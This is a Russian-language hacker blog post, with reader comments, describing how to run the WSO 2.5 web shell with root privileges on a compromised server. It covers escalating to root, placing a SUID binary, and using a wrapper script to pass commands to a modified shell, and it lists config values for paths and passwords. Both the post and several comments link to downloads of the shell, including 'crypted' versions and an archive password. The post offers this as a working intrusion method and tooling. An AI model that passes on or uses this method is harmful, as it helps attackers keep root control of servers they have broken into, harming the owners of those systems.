Итак, читаем сообщение в блоге хакера с ником nobody. Там говорится о способе заставить работать веб-шелл WSO 2.5 из под рута. Этот способ основывается на передаче команд php-интерпретатору, который вызывается из-под рута.
Сначала поднимаем на целевом сервере права до root`a. Получаем суидник.
Далее нам понадобится два файла:
- wrapper.php - скрипт, который будет передавать команды веб-шеллу
- wso_root.php - сам веб-шелл. Его пришлось немного модифицировать
//configКак вы наверно поняли:
$suid = "/tmp/bin";
$suid_pass = "123";
$wso_path = "/var/www/site/shell.php";
$suid - путь до суидника;
$suid_pass - пароль от суидника;
$wso_path - путь до веб-шелла
Демонстрация (картинка кликабельная):
Замечание: этот способ пока работает только с шеллами, которые не защищены паролем.
Скачать: wso_root.zip
P.S. авторство этого способа принадлежит nobody
метод юзаю уже несколько месяцев, тока у мну wso 2.4 рутовый :-) надо обновится
ОтветитьУдалить$suid_pass - пароль от суидника где его взять
ОтветитьУдалить$suid_pass - пароль от суидника, указывается в исходнике суидника.
ОтветитьУдалитькстати, проблема с загрузкой и копированием файлов решаема?
ОтветитьУдалитьвот обновленная крипт версия http://gfile.ru/a5DOc
ОтветитьУдалитьhttp://gfile.ru/a8cR5
ОтветитьУдалить[url=http://myfolder.ru/files/40408915]скачать[/url] пароль на архив wso
ОтветитьУдалить